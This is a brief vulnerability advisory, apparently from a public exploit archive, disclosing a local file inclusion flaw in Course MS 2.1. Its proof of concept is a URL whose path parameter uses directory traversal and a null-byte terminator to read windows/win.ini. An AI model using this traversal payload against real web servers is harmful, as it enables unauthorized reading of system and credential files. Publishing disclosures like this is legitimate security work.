------------------------------------------------------------------------ Software................Course MS 2.1 Vulnerability...........Local File Inclusion Download................http://sourceforge.net/projects/coursems Release Date............2/14/2011 Tested On...............Windows Vista + XAMPP ------------------------------------------------------------------------ Author..................AutoSec Tools Site....................http://www.autosectools.com/ ------------------------------------------------------------------------ --Description-- A local file inclusion vulnerability in Course MS 2.1 can be exploited to include arbitrary files. --PoC-- http://localhost/coursems2_2/download_file.php?path=../../../../../../../../windows/win.ini%00